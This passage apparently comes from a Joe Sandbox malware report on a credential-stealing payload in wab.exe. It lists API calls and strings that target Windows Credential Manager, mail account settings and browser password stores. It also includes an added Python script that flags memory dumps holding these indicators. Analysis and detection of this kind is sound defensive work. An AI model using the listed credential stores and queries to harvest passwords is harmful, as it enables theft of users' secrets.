                                          • String ID: TranslatorName$TranslatorURL$general$strings
                                          • API String ID: 1035899707-3647959541
                                          • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                          • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                          • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                          • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                          • API String ID: 2360744853-2229823034
                                          • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                          • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                          • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                          • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
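The function listings above (key4.db with the nssPrivate and metadata queries, logins.json/signons.sqlite/signons.txt, the CredReadA/CredEnumerateA/CredEnumerateW imports resolved from advapi32.dll, the Creds/ps:password registry walk, the psapi.dll process enumeration, and the imap:// and mailbox:// account formats) are the string-level footprint of the WebBrowserPassView-style recovery tool unpacked into wab.exe. The following is an added triage script, not Joe Sandbox, NirSoft or Remcos code: it scans a raw memory dump for exactly those strings and maps co-occurring hits to the credential-access capability they imply. The capability names, the strong/weak split (short or common tokens such as "Creds" and "advapi32.dll" only count in pairs) and the sample byte blobs are this example's own assumptions.

```python
"""
Added triage example (not Joe Sandbox, NirSoft or Remcos code): scan a raw
process memory dump for the credential-access strings recorded in the function
listings above and map each hit to the capability it implies.
Capability names and the strong/weak split are this example's own choices.
"""
from typing import Dict, List, Tuple

# Strings taken from the IDA plugin blocks above. "strong" needles are
# specific enough to count on their own; "weak" needles (short or common
# in benign binaries, e.g. "Creds", "advapi32.dll") only count in pairs.
INDICATORS: Dict[str, Dict[str, List[bytes]]] = {
    "firefox_credential_store": {
        "strong": [
            b"SELECT a11,a102 FROM nssPrivate",
            b"SELECT item1,item2 FROM metadata WHERE id = 'password'",
            b"signons.sqlite",
            b"logins.json",
        ],
        "weak": [b"key4.db", b"nssPrivate"],
    },
    "windows_credential_manager": {
        "strong": [b"CredEnumerateA", b"CredEnumerateW", b"CredReadA"],
        "weak": [b"advapi32.dll", b"CredFree"],
    },
    "ie_protected_storage": {
        "strong": [b"ps:password"],
        "weak": [b"Creds"],
    },
    "process_enumeration": {
        "strong": [],
        "weak": [b"psapi.dll", b"EnumProcesses", b"EnumProcessModules",
                 b"GetModuleFileNameExA"],
    },
    "mail_client_accounts": {
        "strong": [b"imap://%s@%s", b"mailbox://%s@%s"],
        "weak": [b"imap://", b"mailbox://"],
    },
}


def scan_dump(data: bytes) -> Dict[str, List[str]]:
    """Return {capability: matched strings} for capabilities that qualify.

    A capability qualifies when any strong needle is present, or when at
    least two weak needles are present. Needles are matched as the ANSI
    byte strings the binary stores (the report shows the *A API variants).
    """
    hits: Dict[str, List[str]] = {}
    for capability, groups in INDICATORS.items():
        strong = [n for n in groups["strong"] if n in data]
        weak = [n for n in groups["weak"] if n in data]
        if strong or len(weak) >= 2:
            hits[capability] = sorted(n.decode("latin-1") for n in strong + weak)
    return hits


def triage(data: bytes, min_capabilities: int = 2) -> Tuple[bool, Dict[str, List[str]]]:
    """Flag the dump as a credential harvester when enough capabilities co-occur."""
    hits = scan_dump(data)
    return len(hits) >= min_capabilities, hits


# Constructed sample inputs (not real dumps): indicator strings embedded in junk.
SAMPLE_STEALER = (
    b"\x00" * 32 + b"key4.db\x00"
    + b"SELECT item1,item2 FROM metadata WHERE id = 'password'\x00"
    + b"\x90" * 16 + b"CredEnumerateW\x00advapi32.dll\x00"
    + b"psapi.dll\x00EnumProcesses\x00" + b"\xff" * 8
)
# A benign-looking blob: one weak token per capability must not trigger anything.
SAMPLE_BENIGN = b"advapi32.dll\x00Creds\x00" + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in (("stealer", SAMPLE_STEALER), ("benign", SAMPLE_BENIGN)):
        flagged, hits = triage(blob)
        print(f"{name}: flagged={flagged} {hits}")
```

Run it against the .sdmp files Joe Sandbox exports (open the file in binary mode and pass the bytes to triage) to confirm which credential stores a dumped region targets; the pair rule for weak tokens keeps a lone "advapi32.dll" or "Creds" in an ordinary process from raising the flag.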
                                          APIs
                                          • strchr.MSVCRT ref: 004100E4
                                          • _mbscpy.MSVCRT ref: 004100F2
                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                          • _mbscpy.MSVCRT ref: 00410142
                                          • _mbscat.MSVCRT ref: 0041014D
                                          • memset.MSVCRT ref: 00410129
                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                          • memset.MSVCRT ref: 00410171
                                          • memcpy.MSVCRT ref: 0041018C
                                          • _mbscat.MSVCRT ref: 00410197
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          • API String ID: 912701516-1821301763
                                          • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                          • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$strlen
                                          • String ID: -journal$-wal$immutable$nolock
                                          • API String ID: 2619041689-3408036318
                                          • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                          • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                          • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                          • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                          APIs
                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          • wcslen.MSVCRT ref: 0040874A
                                          • _wcsncoll.MSVCRT ref: 00408794
                                          • memset.MSVCRT ref: 0040882A
                                          • memcpy.MSVCRT ref: 00408849
                                          • wcschr.MSVCRT ref: 0040889F
                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                          • String ID: J$Microsoft_WinInet
                                          • API String ID: 2203907242-260894208
                                          • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                          • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                          • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                          • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                          APIs
                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                          • memcpy.MSVCRT ref: 00410961
                                          Strings
                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                          • API String ID: 2859077140-2022683286
                                          • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                          • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                          • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                          • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                          APIs
                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                          • _mbscpy.MSVCRT ref: 00409686
                                          • _mbscpy.MSVCRT ref: 00409696
                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                          • API String ID: 888011440-2039793938
                                          • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                          • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                          APIs
                                          Strings
                                          • database %s is already in use, xrefs: 0042E9CE
                                          • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                          • database is already attached, xrefs: 0042EA97
                                          • cannot ATTACH database within transaction, xrefs: 0042E966
                                          • too many attached databases - max %d, xrefs: 0042E951
                                          • unable to open database: %s, xrefs: 0042EBD6
                                          • out of memory, xrefs: 0042EBEF
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                          • API String ID: 1297977491-2001300268
                                          • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                          • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                          • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                          • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                          APIs
                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                          • strchr.MSVCRT ref: 0040327B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringstrchr
                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                          • API String ID: 1348940319-1729847305
                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                          • API String ID: 3510742995-3273207271
                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                          APIs
                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                          • memset.MSVCRT ref: 0040FA1E
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                          • _strnicmp.MSVCRT ref: 0040FA4F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                          • String ID: WindowsLive:name=*$windowslive:name=
                                          • API String ID: 945165440-3589380929
                                          • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                          • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                          • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                          • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                          APIs
                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                            • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                          • strchr.MSVCRT ref: 0040371F
                                          • _mbscpy.MSVCRT ref: 00403748
                                          • _mbscpy.MSVCRT ref: 00403758
                                          • strlen.MSVCRT ref: 00403778
                                          • sprintf.MSVCRT ref: 0040379C
                                          • _mbscpy.MSVCRT ref: 004037B2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                          • String ID: %s@gmail.com
                                          • API String ID: 500647785-4097000612
                                          • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                          • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                          APIs
                                          • memset.MSVCRT ref: 004094C8
                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                          • memset.MSVCRT ref: 0040950C
                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                          • _strcmpi.MSVCRT ref: 00409531
                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                          • String ID: sysdatetimepick32
                                          • API String ID: 3411445237-4169760276
                                          • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                          • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                          APIs
                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                          • String ID:
                                          • API String ID: 3642520215-0
                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                          APIs
                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                          • GetDC.USER32(00000000), ref: 004072FB
                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                          • String ID:
                                          • API String ID: 1999381814-0
                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                          • API String ID: 1297977491-3883738016
                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                          APIs
                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                            • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                          • memcpy.MSVCRT ref: 0044972E
                                          • memcpy.MSVCRT ref: 0044977B
                                          • memcpy.MSVCRT ref: 004497F6
                                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                            • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                          • memcpy.MSVCRT ref: 00449846
                                          • memcpy.MSVCRT ref: 00449887
                                          • memcpy.MSVCRT ref: 004498B8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: gj
                                          • API String ID: 438689982-4203073231
                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: __aulldvrm$__aullrem
                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                          • API String ID: 643879872-978417875
                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                          • memset.MSVCRT ref: 004058C3
                                          • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                          • SetFocus.USER32(?), ref: 00405976
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MessageSend$FocusItemmemset
                                          • String ID:
                                          • API String ID: 4281309102-0
                                          • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                          • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                          • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                          • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                          APIs
                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                          • _mbscat.MSVCRT ref: 0040A8FF
                                          • sprintf.MSVCRT ref: 0040A921
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileWrite_mbscatsprintfstrlen
                                          • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                          • API String ID: 1631269929-4153097237
                                          • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                          • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                          • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                          • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                          APIs
                                          • memset.MSVCRT ref: 0040810E
                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
